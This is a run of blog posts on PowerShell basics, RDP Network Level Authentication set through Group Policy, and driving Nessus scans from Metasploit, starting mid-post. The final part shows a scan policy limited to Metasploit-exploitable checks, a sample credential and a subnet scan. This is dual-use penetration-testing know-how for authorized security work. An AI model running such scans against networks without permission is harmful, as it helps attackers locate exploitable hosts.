GetObjectData             Method         System.Void GetObjectData(System.Runtime.Serialization.SerializationInfo in...
GetType                   Method         type GetType()
InitializeLifetimeService Method         System.Object InitializeLifetimeService()
MoveTo                    Method         System.Void MoveTo(string destFileName)
Open                      Method         System.IO.FileStream Open(System.IO.FileMode mode), System.IO.FileStream Op...
OpenRead                  Method         System.IO.FileStream OpenRead()
OpenText                  Method         System.IO.StreamReader OpenText()
OpenWrite                 Method         System.IO.FileStream OpenWrite()
Refresh                   Method         System.Void Refresh()
Replace                   Method         System.IO.FileInfo Replace(string destinationFileName, string destinationBa...
SetAccessControl          Method         System.Void SetAccessControl(System.Security.AccessControl.FileSecurity fil...
ToString                  Method         string ToString()
PSChildName               NoteProperty   System.String PSChildName=testfile
PSDrive                   NoteProperty   System.Management.Automation.PSDriveInfo PSDrive=C
PSIsContainer             NoteProperty   System.Boolean PSIsContainer=False
PSParentPath              NoteProperty   System.String PSParentPath=Microsoft.PowerShell.Core\FileSystem::C:\testfolder
PSPath                    NoteProperty   System.String PSPath=Microsoft.PowerShell.Core\FileSystem::C:\testfolder\te...
PSProvider                NoteProperty   System.Management.Automation.ProviderInfo PSProvider=Microsoft.PowerShell.C...
Attributes                Property       System.IO.FileAttributes Attributes {get;set;}
CreationTime              Property       System.DateTime CreationTime {get;set;}
CreationTimeUtc           Property       System.DateTime CreationTimeUtc {get;set;}
Directory                 Property       System.IO.DirectoryInfo Directory {get;}
DirectoryName             Property       System.String DirectoryName {get;}
Exists                    Property       System.Boolean Exists {get;}
Extension                 Property       System.String Extension {get;}
FullName                  Property       System.String FullName {get;}
IsReadOnly                Property       System.Boolean IsReadOnly {get;set;}
LastAccessTime            Property       System.DateTime LastAccessTime {get;set;}
LastAccessTimeUtc         Property       System.DateTime LastAccessTimeUtc {get;set;}
LastWriteTime             Property       System.DateTime LastWriteTime {get;set;}
LastWriteTimeUtc          Property       System.DateTime LastWriteTimeUtc {get;set;}
Length                    Property       System.Int64 Length {get;}
Name                      Property       System.String Name {get;}
BaseName                  ScriptProperty System.Object BaseName {get=if ($this.Extension.Length -gt 0){$this.Name.Re...
VersionInfo               ScriptProperty System.Object VersionInfo {get=[System.Diagnostics.FileVersionInfo]::GetVer...

For getting properties for the file object we have several ways to achive this first one is using the Get-ItemProperty cmdlet by given as the name the object property:

PS C:\> Get-ItemProperty -Path .\testfolder\testfile -Name LastAccessTime

PSPath         : Microsoft.PowerShell.Core\FileSystem::C:\testfolder\testfile
PSParentPath   : Microsoft.PowerShell.Core\FileSystem::C:\testfolder
PSChildName    : testfile
PSDrive        : C
PSProvider     : Microsoft.PowerShell.Core\FileSystem
LastAccessTime : 4/9/2012 11:53:25 AM

Another Method we can use is to get the object and just request it, lets look at some properties that security professionals will find quite interesting:

PS C:\> (Get-Item -Path .\testfolder\testfile).LastWriteTime

Monday, April 09, 2012 11:53:25 AM


PS C:\> (Get-Item -Path .\testfolder\testfile).LastAccessTime

Monday, April 09, 2012 11:53:25 AM


PS C:\> (Get-Item -Path C:\Windows\System32\aaclient.dll).VersionInfo

ProductVersion   FileVersion      FileName
--------------   -----------      --------
6.1.7600.16385   6.1.7600.1638... C:\Windows\System32\aaclient.dll

Just like other shell we can redirect output of commands as text to files using > and >> symbols:

• cmdlet > filename - Redirect command output to a file and overwrite content.
• cmdlet >> filename - append into a file
• cmdlet 2> filename - Redirect Errors from operation to a file and overwrite content.
• cmdlet 2>> filename - Append errors to a file
• cmdlet 2>&1 - Add errors to output
• cmdlet 1>&2 - Add output to errors

Lets look also at the Add-Content cmdlet:

PS C:\> Add-Content -Path C:\testfolder\testfile -Value (get-date)
PS C:\> Get-Content -Path C:\testfolder\testfile
4/9/2012 3:39:29 PM

Lets work with the object method to modify the file, in this case we will use EFS to encrypt the file on NTFS, lets start with checking if the file is encrypted:

PS C:\> (Get-Item -Path .\testfolder\testfile).attributes
Archive

Now lets encrypt the file and see if its encrypted:

PS C:\> (Get-Item -Path .\testfolder\testfile).encrypt()
PS C:\> (Get-Item -Path .\testfolder\testfile).attributes
Archive, Encrypted

We can even confirm using the cipher.exe command:

PS C:\> cipher.exe /c .\testfolder\testfile

 Listing C:\testfolder\
 New files added to this directory will not be encrypted.

E testfile
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    infidel01\Carlos [Carlos(Carlos@infidel01)]
    Certificate thumbprint: 45F5 3D35 94B0 3C47 B727 AB63 0198 F19A 2793 1283

  No recovery certificate found.

  Key Information:
    Algorithm: AES
    Key Length: 256
    Key Entropy: 256

Lets Rename an item with the Rename-Item cmdlet:

PS C:\> Rename-Item -Path C:\testfolder -NewName test_folder
PS C:\> ls


    Directory: C:\


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         7/13/2009  11:20 PM            PerfLogs
d-r--          4/5/2012  10:27 PM            Program Files
d-r--          4/8/2012   6:39 PM            Program Files (x86)
d----          4/5/2012   7:42 PM            Python27
d----          4/5/2012   7:41 PM            Python32
d----          4/5/2012   7:38 PM            Ruby193
d----          4/6/2012  12:27 PM            SysinternalsSuite
d----          4/9/2012   4:44 PM            test_folder
d-r--          4/5/2012  10:54 PM            Users
d----          4/8/2012  11:14 AM            Windows
-a---          4/5/2012  10:32 PM       1024 .rnd

Lets delete the file we have been using for the examples:

PS C:\> Remove-Item -Path C:\test_folder\testfil
PS C:\> ls .\test_folder


    Directory: C:\test_folder


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---          4/9/2012   3:39 PM         21 testfile


PS C:\>  Remove-Item -Path C:\test_folder\testfile
PS C:\> ls .\test_folder

Working with Paths

Lets look at working with paths, we will firs start with defining the difference of Path and LiteralPath in the parameters of several commands. This is a source of confusion for many people learning PowerShell on their own by exploring the shell cmdlets. When working with a file system on a drive or share Powershell Windows restricts the characters that can be used for a file name, like *, ?, /, $ and others since they are use for variable expansion and wildcard search but since PowerShell lets us work with Active Directory, Certificate Store, Registry and others that do not have the same restrictions as the file system. This is why we use -Path when we want the special characters treated as wildcards and -LiteralPath for those cases where those special characters are part of the item names. An example of expansion:

PS C:\> Set-Location -Path Perf*
PS C:\PerfLogs>

We can see as wildcards where used to match the path. To get the current location of where we are in a provider we use the Get-Location cmdlet:

PS C:\PerfLogs> Get-Location

Path
----
C:\PerfLogs

To Change locations we use the Set-Location cmdlet:

PS C:\PerfLogs> Set-Location C:\testfolder
PS C:\testfolder> Get-Location

Path
----
C:\testfolder

We can take a path and add a child item to the path with Join-Path cmdlet:

PS C:\> Join-Path -Path C:\Windows -ChildPath system
C:\Windows\system

We can also have it join a path using wildcards:

PS C:\> Join-Path -Path C:\Win* -ChildPath tem* -Resolve
C:\Windows\Temp

We can also give it a list of path to append a child object to:

PS C:\> join-path -path c:\windows,c:\python,c:\ruby  -ChildPath temp
c:\windows\temp
c:\python\temp
c:\ruby\temp

Some time we will find our self with path that we obtained from a property of an object and we may need to extract parts of the path, for this we will use the Split-Path cmdlet and we can get different pats of the paths depending of what we want:

PS C:\> split-path c:\windows\secret.txt
c:\windows
PS C:\> split-path c:\windows\secret.txt -Qualifier
c:
PS C:\> split-path c:\windows\secret.txt -NoQualifier
\windows\secret.txt
PS C:\> split-path c:\windows\secret.txt -Parent
c:\windows
PS C:\> split-path c:\windows\secret.txt -Leaf
secret.txt

It also supports extracting parts from other types of paths:

PS C:\> Split-Path -Path /var/log/tftp.log -Leaf
tftp.log
PS C:\> Split-Path -Path /var/log/tftp.log -Parent
\var\log
PS C:\> split-path -Path http://www.darkoperator.com/index.html -Qualifier
http:
PS C:\> split-path -Path http://www.darkoperator.com/index.html -NoQualifier
//www.darkoperator.com/index.html

We can test if a path exists:

PS C:\> test-path -path HKLM:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
True
PS C:\> test-path -path C:\Windows
True
PS C:\> test-path -path C:\Windows\system32\aaclient.dll
True

As we can see this works with both files, folders and even other paths in other providers. Lets say we want to test is the path is for a File or a Folder, for this we will use Container for Folder and Leaf for File:

PS C:\> test-path -path C:\Windows\system32\aaclient.dll -PathType leaf
True
PS C:\> test-path -path C:\Windows\system32\aaclient.dll -PathType container
False

Conclusion

I invite you to keep exploring in the registry, variables and other psdrives available and learning what is possible and not and the differences in the parameters we can use with this providers. As always I hope this blog post is useful and informative.

You will notice that for the PowerShell commands I use the word Cmdlet, that is how Microsoft calls and spells the word. In a PowerShell shell you can execute regular windows commands in addition to the cmdlets and most work without any problem some may experience problems depending on the parameters used since PowerShell uses space as a delimiter so do keep this in mind when you are running local exe files.

PowerShell cmdlets are in the form of a <verb>-<noun>, you will see common verbs like set, get, clear, write and stop to name a few and each belong to a group of actions, you can get an updated list of verbs at the TechNet site http://social.technet.microsoft.com/wiki/contents/articles/4537.powershell-approved-verbs-en-us.aspx do keep this list handy because if you create any module, cmdlet or function you should follow the naming so as to not confuse users and not get warnings from PowerShell when loading modules or cmdlets. To get a list of cmdlets on PS we use the Get-Command cmdlet:

  When ran with no options we get a list of all cmdlet, functions and Aliases we have available. Just like on a Unix shell you will notice you have functions and aliases at your disposal to call. Aliases are mainly for saving time when entering commands and to make others more familiar when ran in a shell like the ls or the cat commands:

PS C:\Users\Carlos Perez> ls
    Directory: C:\Users\Carlos Perez
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d-r--         2/16/2012   3:03 PM            Contacts
d-r--         3/26/2012  11:23 PM            Desktop
d-r--         2/16/2012   3:03 PM            Documents
d-r--          3/8/2012   3:52 PM            Downloads
d-r--         2/16/2012   3:03 PM            Favorites
d-r--         2/16/2012   3:03 PM            Links
d-r--         2/16/2012   3:03 PM            Music
d-r--         2/16/2012   3:03 PM            Pictures
d-r--         2/16/2012   3:03 PM            Saved Games
d-r--         2/16/2012   3:03 PM            Searches
d-r--         2/16/2012   3:03 PM            Videos
-a---         3/28/2012   8:16 PM         28 hello.txt
PS C:\Users\Carlos Perez> cat .\hello.txt
hello world
PS C:\Users\Carlos Perez> rm .\hello.txt
PS C:\Users\Carlos Perez> ls
    Directory: C:\Users\Carlos Perez
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d-r--         2/16/2012   3:03 PM            Contacts
d-r--         3/26/2012  11:23 PM            Desktop
d-r--         2/16/2012   3:03 PM            Documents
d-r--          3/8/2012   3:52 PM            Downloads
d-r--         2/16/2012   3:03 PM            Favorites
d-r--         2/16/2012   3:03 PM            Links
d-r--         2/16/2012   3:03 PM            Music
d-r--         2/16/2012   3:03 PM            Pictures
d-r--         2/16/2012   3:03 PM            Saved Games
d-r--         2/16/2012   3:03 PM            Searches
d-r--         2/16/2012   3:03 PM            Videos

As we can see the aliases makes the shell behave similar to a Unix/Linux shell, but do keep in mind it is only similar, the parameters are not the same. 

One can use the tab key to auto complete PSDrive Paths (More on this on another blog post), File Paths,  Functions, Cmdlets, Function Options, Cmdlets Parameters, Variables and regular Windows Commands. So one can so Get-<tab> and keep hitting tab to cycle through the cmdlets available with the verb Get, the same can be done to find a cmdlet parameter like Get-Service –<tab>

The Get-Command also allow us to filter using wildcards:

PS C:\Users\Carlos Perez> Get-Command -Name *service* -CommandType cmdlet
CommandType     Name                                                Definition
-----------     ----                                                ----------
Cmdlet          Get-Service                                         Get-Service [[-Name] <String[]>] [-ComputerName ...
Cmdlet          New-Service                                         New-Service [-Name] <String> [-BinaryPathName] <...
Cmdlet          New-WebServiceProxy                                 New-WebServiceProxy [-Uri] <Uri> [[-Class] <Stri...
Cmdlet          Restart-Service                                     Restart-Service [-Name] <String[]> [-Force] [-Pa...
Cmdlet          Resume-Service                                      Resume-Service [-Name] <String[]> [-PassThru] [-...
Cmdlet          Set-Service                                         Set-Service [-Name] <String> [-ComputerName <Str...
Cmdlet          Start-Service                                       Start-Service [-Name] <String[]> [-PassThru] [-I...
Cmdlet          Stop-Service                                        Stop-Service [-Name] <String[]> [-Force] [-PassT...
Cmdlet          Suspend-Service                                     Suspend-Service [-Name] <String[]> [-PassThru] [...

On Windows 8 in PowerShell v3 we have the the Show-Command cmdlet that will bring a GUI Interface for exploring the cmdlet and it options allowing us to copy the command we build or run the command:

When we want to get specific help on any cmdlet we can use the get-help cmdlet or it’s alias help:

This will provide us with a base help for the cmdlet where we can see:

• Name
• Synopsis
• Syntax
• Description
• Related Links
• Remarks

We can use the –detail option to get more details on the options, their types and position in the command arguments if we pass each value without an option, we can also use the –examples to get example on how to use the cmdlet and a brief description of what the command is doing and we can get a with –full the entire content of the help message. You can consider help/Get-Help as the man command in Unix/Linux. When you look at the Syntax section the options you can quickly determine what values you can provide to them. When we see the message we will see that each optional Parameter we can pass is between [ ], if a parameter is not optional it will not be enclosed in [ ], some options do not require values those are just –<Parametername> other will take a value, for those that take a value PS will let you know the value type if it is a string, integer, object ..etc between <>, some can take a list of values and you will notice those will be in the format of <type[]>  and those that have a predefined list of options that can be given to a parameter will be in the format of < option1 | option2 | option3>.  I highly recommend that when starting with a cmdlet for the first time to use the –full parameter when getting help. The full help message will provide us additional information for each parameter as shown bellow:

 -Name <string[]>
     Specifies the service names of services to be retrieved. Wildcards are permitted. By default, Get-Service gets
     all of the services on the computer.
     Required?                    false
     Position?                    1
     Default value
     Accept pipeline input?       true (ByValue, ByPropertyName)
     Accept wildcard characters?  true
 -RequiredServices [<SwitchParameter>]
     Gets only the services that this service requires.
     This parameter gets the value of the ServicesDependedOn property of the service. By default, Get-Service gets a
     ll services.
     Required?                    false
     Position?                    named
     Default value                False
     Accept pipeline input?       false
     Accept wildcard characters?  false

As it can be seen for the –Name parameter we can see additional information like if it is required or not, the position when calling the cmdlet, this means that the cmdlet will take the first thing given to it an use it as the value for this parameter when the parameter is not given, we can also see it accepts inputs from the pipeline and that this can be a value or a property. In the case of the RequiredServices  parameter the position is named, that means that the name of the parameter must be specified with the value.

If the computer you are running PowerShell on has internet connectivity you can give the parameter–online to the Get-Help cmdlet to open a browser window with the latest help information for it.

Let take a look at the Get-Service cmdlet:  

As we can see we in syntax we can call the cmdlet in 3 different ways, one where we start by providing the name or names of the service, another where we provide Display Names and a third where we pass service controller objects (Remember PowerShell cmdlets output objects). Let look at the first one:

Get-Service [[-Name] <string[]>] [-ComputerName <string[]>] [-DependentServices] [-Exclude <string[]>] [-Include <string[]>] [-RequiredServices] [<CommonParameters>]

As we can see the –Name parameter takes a list of strings. Lets get the state of several services:

PS C:\Users\Carlos Perez> Get-Service -Name BITS, VSS
Status   Name               DisplayName
------   ----               -----------
Running  BITS               Background Intelligent Transfer Ser...
Stopped  VSS                Volume Shadow Copy

Now we ask for a full help for the command we will see for the name option that it accepts wildcard characters for the parameter of -Name and for the parameter of –DisplayName  so we can search for any service with the word WMI in its Display Name:

PS C:\Users\Carlos Perez> Get-Service -DisplayName *WMI*
Status   Name               DisplayName
------   ----               -----------
Stopped  wmiApSrv           WMI Performance Adapter

The Wildcard Characters that can be used are shown in the table bellow:

In PowerShell one can use parameter abbreviation, similar to what one can do with commands on Cisco IOS we only need to enter enough of the parameter name that is is unique against the other. In the Get-Process cmdlet the only parameter that starts with the letter N is Name so we can shorten it to only this letter:

PS C:\Users\Carlos Perez> Get-Process -N *vm*
Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
-------  ------    -----      ----- -----   ------     -- -----------
    270      20     8956       7708    87            1392 vmtoolsd
    289      23    15252      14388   145   113.97   2544 vmtoolsd
     68       9     3444       3148    68     0.55   2532 VMwareTray

As we play with parameters and comandlets one of the things we can do is to maintain a transcript. We can do this with the Start-Transcript cmdlet, this will save all of our commands and output to a file and when we issue the cmdlet Stop-Transcript it will stop recording our action, we can even append to an existing file by giving it the –Append parameter. One thing to note is that you can not use it on ISE.

PS C:\Windows\system32> Start-Transcript C:\windows\Temp\testtranscript.txt
Transcript started, output file is C:\windows\Temp\testtranscript.txt
PS C:\Windows\system32> Get-Service | select -first 1
Status   Name               DisplayName
------   ----               -----------
Stopped  AeLookupSvc        Application Experience
PS C:\Windows\system32> Get-process | select -first 1
Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
-------  ------    -----      ----- -----   ------     -- -----------
     23       4     2128       1460    38     0.09    408 cmd
LogName: PS C:\Windows\system32> Stop-Transcript
Transcript stopped, output file is C:\windows\Temp\testtranscript.txt

Now as mentioned before PowerShell cmdlets return objects and we can pipe this objects to other cmdlets. We can illustrate by saving an object in to a variable and looking at what we have available. In PowerShell variables start with with $ In this example we will look at the object for the BITS service:

PS C:\Windows\system32> $srv = Get-Service -Name BITS
PS C:\Windows\system32> $srv
Status   Name               DisplayName
------   ----               -----------
Running  BITS               Background Intelligent Transfer Ser...

If we want to know it’s type we can use the .Net method of gettype()

PS C:\Windows\system32> $srv.GetType().fullname
System.ServiceProcess.ServiceController

If we want to look at the methods (actions that can be taken) and Properties (Information) of an object we can use the Get-Members cmdlet.

PS C:\Windows\system32> Get-Member -InputObject $srv
   TypeName: System.ServiceProcess.ServiceController
Name                      MemberType    Definition
----                      ----------    ----------
Name                      AliasProperty Name = ServiceName
RequiredServices          AliasProperty RequiredServices = ServicesDependedOn
Disposed                  Event         System.EventHandler Disposed(System.Object, System.EventArgs)
Close                     Method        System.Void Close()
Continue                  Method        System.Void Continue()
CreateObjRef              Method        System.Runtime.Remoting.ObjRef CreateObjRef(type requestedType)
Dispose                   Method        System.Void Dispose()
Equals                    Method        bool Equals(System.Object obj)
ExecuteCommand            Method        System.Void ExecuteCommand(int command)
GetHashCode               Method        int GetHashCode()
GetLifetimeService        Method        System.Object GetLifetimeService()
GetType                   Method        type GetType()
InitializeLifetimeService Method        System.Object InitializeLifetimeService()
Pause                     Method        System.Void Pause()
Refresh                   Method        System.Void Refresh()
Start                     Method        System.Void Start(), System.Void Start(string[] args)
Stop                      Method        System.Void Stop()
ToString                  Method        string ToString()
WaitForStatus             Method        System.Void WaitForStatus(System.ServiceProcess.ServiceControllerStatus desi...
CanPauseAndContinue       Property      System.Boolean CanPauseAndContinue {get;}
CanShutdown               Property      System.Boolean CanShutdown {get;}
CanStop                   Property      System.Boolean CanStop {get;}
Container                 Property      System.ComponentModel.IContainer Container {get;}
DependentServices         Property      System.ServiceProcess.ServiceController[] DependentServices {get;}
DisplayName               Property      System.String DisplayName {get;set;}
MachineName               Property      System.String MachineName {get;set;}
ServiceHandle             Property      System.Runtime.InteropServices.SafeHandle ServiceHandle {get;}
ServiceName               Property      System.String ServiceName {get;set;}
ServicesDependedOn        Property      System.ServiceProcess.ServiceController[] ServicesDependedOn {get;}
ServiceType               Property      System.ServiceProcess.ServiceType ServiceType {get;}
Site                      Property      System.ComponentModel.ISite Site {get;set;}
Status                    Property      System.ServiceProcess.ServiceControllerStatus Status {get;}

We can also pipe the contents of the variable to the the cmdlet like so $srv | Get-Members as we can see we can get information like status, type, dependencies and we can take actions like pause , start and stop. we can also use tab completion to cycle thru the methods and properties of an object when it is in a variable.

Lets stop the service and get it’s status before and after:

PS C:\Windows\system32> (Get-Service -Name BITS).status
Stopped
PS C:\Windows\system32> (Get-Service -Name BITS).start()
PS C:\Windows\system32> (Get-Service -Name BITS).status
Running

You will notice that methods are always called with ( )  in the end since a methods takes parameters, properties we can call directly and they are the state of when the object was created that is why we execute the command and work with the object directly by running the command between parenthesis. 

Also properties and the results from methods can have methods and more properties beneath them, we can chain this to get the value or results we want.

PS C:\Windows\system32> $srv.Status.GetType()
IsPublic IsSerial Name                                     BaseType
-------- -------- ----                                     --------
True     True     ServiceControllerStatus                  System.Enum

Another way would be to use the refresh method:

PS C:\Windows\system32> $srv.Status
Running
PS C:\Windows\system32> $srv.Stop()
PS C:\Windows\system32> $srv.Refresh()
PS C:\Windows\system32> $srv.Status
Stopped

As you can see one of the main advantages of PowerShell is the is the advantage to manipulate the data as objects and not as text. In the next post I will cover more on how to work with several objects, how to modify the objects and piping.

As always I hope you find this post informative and useful.

I do believe that one of the biggest skills that both Administrator and Security Professional should have is to be able to automate tasks on a systems they are responsible for. Many old Unix long bearded veterans say that admins are lazy and they script and automate tasks because of that, I see it as being smart, we are taking tasks that could take hours and crunch it down to seconds, we reduce risk by making sure an action is repeatable and we learn in the process of automating making us better. So I decided to start a series of blog post and do an introduction on one of my favorite scripting languages which is Microsoft PowerShell.

PowerShell as the name implies is a shell first, a scripting language second. Microsoft a long time ago did a study on areas that they considered they where week and needed improvement and one of this was the ability to automate and administer a system thru a shell. Microsoft designed and came with what I consider a rather unique approach in PowerShell and that is a Object Model based shell. Most shells in Linux, Unix and even cmd.exe shell in Windows are text driven where each command returns it’s out put in strings, in PowerShell the output of each command or cmdlet as it is called in PowerShell is a .Net Object that we can then use in many unique ways.  The grammar is based originally on the POSIX Shell grammar and then evolved and expanded by adding concepts from Perl, Python, VBScript and C#.

Setting Up the Environment

Depending our version of Windows are the steps we need to take to get PowerShell running on our system. On Windows system after Windows 7 and Windows Server 2008 R2 power shell comes built in, on Windows 2008 it i s a feature that needs to be installed from the feature available in server manager and on Windows Vista, Windows XP and Windows 2003 you will need to download the installer from the download section in http://www.microsoft.com/powershell and install the package. For this series I will be covering v2.0 of PowerShell and some of the new improvements that will come with v3.0.  One important thing to keep in mind is that PowerShell uses the .Net framework so running the latest version of .Net Framework will provide us the best flexibility and capabilities on the objects returned from the PowerShell commands.

You will notice the depending your platform and build you will have x86 and/or x64 versions of PowerShell console and PowerShell ISE (Interactive Scripting Environment), the shortcuts will be located in Windows XP, Windows 2003 and Windows Vista in  Start –> All Programs –>Windows PowerShell V2 and on more modern versions of Windows you will find it in Start –> All Programs –> Accessories –> Windows PowerShell in addition to this from a command prompt or from the run dialog box you can call powershell.exe for the console and powershell_ise.exe to launch the Integrated Scripting Environment.

The Console

One of the first things you will notice when you launch the console in your machine it will be a console screen with a Blue background and lightly yellow letters

I recommend that you customize even more the shortcut by doing a Right Click on the PowerSherll Symbol on the top left and selecting Properties

In Options increase Buffer Size so as to save more commands in the buffer and enable QuickEdit Mode and Insert Mode if not selected.

Under Layout we can adjust the With and the Height of our Screen Buffer to better accommodate our screen size and the amount of output history we want for scrolling  in the Console.

If a program line Exchange Server or VMware PowerCLI sets a separate shortcut for a console for use of their snapping we must also do the changes on those shortcuts also. If you run PowerShell by invoking the command via a command prompt or thru the Run dialog box you will be greeted with a screen like this one:

Easily confused with a command prompt and does not have any of the setting we set since those are for the shortcut it self. Since PowerShell is a component at setup none of those settings that come set by default are set because PowerShell reads the information from HKCU\Console for the user. To customize this I recommend you visit this page http://poshcode.org/2220 and copy and paste the PowerShell code shown there and paste it in a PowerShell prompt running as Administrator you can use the Windows Calculator in Scientific mode to set your values in the proper hex values and do the changes in notepad before running the commands. This will give you a console like the one you call from the shortcut in your programs menu. These changes can also be made on Windows 8 running PowerShell v3.

Console Keyboard Commands

In the addition to the history command window one sees when pressing the F7 Key

One can use the Get-History cmdlet or the history alias for the command (More details on command and how to use the history command for generating scripts in blog posts to come) he command will return a list of the commands enter indexed with a number:

PS C:\Users\Carlos Perez> get-history
  Id CommandLine
  -- -----------
   1 dir
   2 Get-Process
   3 Get-Service
   4 Get-Command -Verb get

Integrated Scripting Environment

Microsoft started including with PowerShell 2.0 the ISE (Integrated Scripting Environment) this is more than a script editor it also functions as as interactive shell and support plugins that can extend it’s functionality.

Some of the advantages of the ISE are:

1. Multiple Script editing tabs.
2. Use of easier editing and selection of command output.
3. Color Syntax for PowerShell Scripts
4. Remote PowerShell Session.
5. Execution of selected PowerShell Code with F8
6. Tab Completion for Command and Options

Microsoft greatly improved ISE in PowerShell v3 by adding IntelliSense just like in Visual Studio an improve command window that looks and behaves better and a command search pane:

Conclusion

I invite you to play with settings for your console and ISE and get it to a point where you are confortable with the setup and appearance and also invite you to play a bit with the commands. In the next blog post we will go a little deeper in to the existing commands, loading modules and snapping, getting help and execution policy for scripts. 

CredSSP first establishes an encrypted channel between the client and the target server by using Transport Layer Security (TLS). Using the TLS connection as an encrypted channel; it does not rely on the client/server authentication services that are available in TLS but does uses it for validating identity. The CredSSP Protocol then uses the Simple and Protected Generic Security Service Application Program Interface Negotiation Mechanism (SPNEGO) Protocol Extensions to negotiate a Generic Security Services (GSS) mechanism that performs mutual authentication and GSS confidentiality services to securely bind to the TLS channel and encrypt the credentials for the target server. It should be noted that all GSS security tokens are sent over the encrypted TLS channel. This tokens can be NTL, Kerberos or PKI Authentication for SmartCards.

The graphic bellow illustrates how this is done:

Most brut force tools currently out there do not take in to account NLA, it would slow down the process even more and add another level of complexity. Since no packet will reach the RDP service until CredSSP has finished negotiation of the connection it protects the servers from DoS and exploits.

NLA is present in the latest versions of Windows, for Server:

• Windows 2008
• Windows 2008 R2
• Windows 7
• Windows Vista

On the client side:

• Windows XP SP3
• Windows Vista
• Windows 7
• Windows 2008
• Windows 2008 R2
• Remote Desktop Connection for Mac

NLA was introduced first with RDP 6.0 in Windows Vista and later on Windows XP SP3.

One of the biggest advantages also is that since TLS is used it will warn us if it can not validate the identity of the host we are connecting to. For this we will need a PKI infrastructure integrated with AD in our Windows environment. On a Windows 2008 environment we can install on a server the role of Active Directory Certificate Service to install a Enterprise CA accepting all defaults so it can provide Computer Certificates to the machines in the domain in an automated way using Group Policy.

Configuring a GPO for NLA

In this example I will show how to configure a GPO for issuing a Certificate to each host in the Domain and Configure NLA authentication for RDP. In a production environment you may wish to separate these or keep them in one policy depending on your AD design.

Lets start by selecting from Administrative Tools the Group Policy Management tool:

On the tool we create a New Group Policy Object:

We give this policy a Name:

Once created we edit this policy by right clicking on it an selecting Edit:

Now we select Computer Configuration/Policies/Windows Settings/Public Key Policies/Automatic Certificate Request Settings:

We now right click on Automatic Certificate Request Setting and select to create a new Automatic Certificate Request, this will request to the CA a new Computer Certificate and renew the certificate when it expires automatically.

When the wizard starts we click Next then we select Computer Certificate Template:

We click on Next and then on Finish. Now we select Computer Configuration/Policies/Windows Settings/Public Key Policies under that node we double click on Certificate Services Client – Auto-Enrollment we now select on the properties under Configuration Model we select Enable and make sure that the boxes for managing certificates in the store and for updating the certificate if the template is modified.

Now we have finished the section that will cover the certificate assignment for computers that get this GPO applied to.

For configuring RDP to use NLA we now go to Computer Configuration/Policies/Administrative Templates/Windows Components/Remote Desktop Settings/Remote Desktop Session Host/Security

Select Require user authentication for remote connections by using Network Level Authentication and double click on it. On the properties screen select Enable and click on OK.

Now lets configure the client settings to make sure that we always select to warn in the case the host certificate con not be authenticated. We select Computer Configuration/Policies/Administrative Templates/Windows Components/Remote Desktop Settings/Remote Desktop Connection Client

We double click on Configure Authentication for Client

Select Enable and set the Option to Warn me if authentication fails

Click on OK and close the screen. Know you should have a proper policy that cam be applied, but before we apply the policy we have to give permission on the Domain Computers group in the domain the permission to apply it:

And now we have a GPO that can be linked to any Domain in the forest or Organization Unit. Once applied when a connection is made we can see the security in use by clicking on the lock on the top of a Remote Desktop Session in Windows and it will tell us how we where authenticated:

On those host that do not have RDP enabled you will see that the only option available is to use NLA

As always I hope you find this blog post informative and useful.

Once in policies we click on Add to be brought to the following screes where we can create one, we will put a name and brief description on the policy and let the rest as default:

We can go to the next section by clicking on Next and on this screen we can enter any credentials we may have as well as NTLM hashes for Windows credentials in the passwords field allowing for enumerating local vulnerabilities that might be on the target:

We now move to the plugin section by clicking on Next:

We start by clicking on  Disable All and then click on Add Filter to create a new filter for the plugins. we set the filter for Metasploit Exploit Framework,set the action  is equal to and value to true, we then click on Save to apply the filter:

To enable the plugins in each family we click on the family name text being careful not to click in the circle beside the name and then we click on Enable Plugins at the top of the plugin list: 

Now we click on Next then on Save to save the policy.

Once saved we can use the nessus plugin from the console to connect to the scanner and use it from inside Metasploit. You can use the console in Armitage, MSFConsole or the one in Metasploit Community/Pro/Express to load the plugin for use:

msf > load nessus 
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus

Once the plugin is loaded we can connect to the host that is running the Nessus server using the nessus_connect command and list the policies we have available to us with nessus_policy_list:

msf > nessus_connect carlos:contasena@localhost ok
[*] Connecting to https://localhost:8834/ as carlos
[*] Authenticated
msf > nessus_policy_list 
[+] Nessus Policy List
[+] 
ID  Name                        Comments
--  ----                        --------
-1  External Network Scan       
-2  Internal Network Scan       
-3  Prepare for PCI DSS audits  
-4  Web App Tests               
6   Metasploit Exploits         

We can now use the policy to perform a scan of a network by using the policy ID, name for the scan and specifying a range using the nessus_scan_new command:

msf > nessus_scan_new 6 "contoso pentest" 192.168.1.1-241
[*] Creating scan from policy number 6, called "contoso pentest" and scanning 192.168.1.1-241
[*] Scan started.  uid is 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554

We can monitor the status of the scan using the command nessus_scan_status:

msf > nessus_scan_status 
[+] Running Scans
[+] 
Scan ID                                               Name             Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----             -----   -------            ------   -------------  -----------
396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554  contoso pentest  carlos  11:53 Feb 16 2012  running  217            241
[+] 
[*] You can:
[+]         Import Nessus report to database :     nessus_report_get <reportid>
[+]         Pause a nessus scan :             nessus_scan_pause <scanid>
msf >

Once we can see that the scan is no longer running we can access the report using from the scan using the nessus_report_list command to see its name and ID:

msf > nessus_report_list 
[+] Nessus Report List
[+] 
ID                                                    Name             Status     Date
--                                                    ----             ------     ----
396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554  contoso pentest  completed  11:58 Feb 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>

Now that we have the report ID we can import it but before we do that we must first create a workspace to hose the data so as to keep it separated from any other data we may already be housing in the Metasploit default wroksapace and we use the nessus_report_get command to import the report:

msf > workspace -a contoso
[*] Added workspace: contoso
msf > nessus_report_get 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554
